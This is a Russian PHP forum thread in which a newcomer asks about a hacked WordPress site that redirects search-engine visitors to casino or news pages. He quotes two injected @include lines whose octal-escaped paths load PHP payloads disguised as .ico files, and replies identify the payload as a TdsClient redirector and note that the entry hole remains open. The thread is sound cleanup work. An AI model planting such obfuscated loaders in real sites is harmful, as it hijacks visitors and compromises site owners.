За последние 24 часа нас посетили 18323 программиста и 1733 робота. Сейчас ищут 770 программистов ...

Странный код

Тема в разделе "PHP для новичков", создана пользователем sslaa, 14 май 2019.

  1. sslaa

    sslaa Новичок

    С нами с:
    14 май 2019
    Сообщения:
    1
    Симпатии:
    0
    Здравствуйте, не шибко силен в программировании, но попросили посмотреть сайт один, говорят:
    Если в любом поисковике набрать ключевое слово и высветится наш сайт то при клике он редиректит на какой то новостной портал или игру казино, а если прямую ссылку набрать то нормально заходит на сайт. Начал только капать и наткнулся на странные строчки:
    Код (Text):
    1. /*7bdbc*/
    2.  
    3. @include "\057h\157m\145/\142i\147m\141r\154i\156b\157s\163/\160u\142l\151c\137h\164m\154/\167p\055c\157n\164e\156t\057p\154u\147i\156s\057.\0710\060f\067f\0672\056i\143o";
    4.  
    5. /*7bdbc*/
    6.  
    7.  
    8. /*a5b25*/
    9.  
    10. @include "\057h\157m\1454\057r\151b\141l\153o\146/\160u\142l\151c\137h\164m\154/\142i\147m\141r\154i\156p\165n\164a\143a\156a\056c\157m\057w\160-\151n\143l\165d\145s\057j\163/\163w\146u\160l\157a\144/\056e\1424\0666\0628\141.\151c\157";
    11.  
    12. /*a5b25*/
    Понял, что тут путь зашифрован на файл .ico
    открыл его, а там тоже php код.

    в приложении этот файл с измененным расширением.

    Так вот, вопрос. это и есть та зараза, или дальше искать?
     

    Вложения:

    • .900f7f72.txt
      Размер файла:
      75,1 КБ
      Просмотров:
      5
  2. Artur_hopf

    Artur_hopf Старожил

    С нами с:
    7 май 2018
    Сообщения:
    2.264
    Симпатии:
    405
    @sslaa закомментируй и посмотри разницу.
     
  3. Emilien

    Emilien Активный пользователь

    С нами с:
    30 июн 2016
    Сообщения:
    246
    Симпатии:
    156
    В том файле после череды eval расшифровывается TdsClient.
    Простое удаление этого файла не закроет дыру через которую его залили на сайт.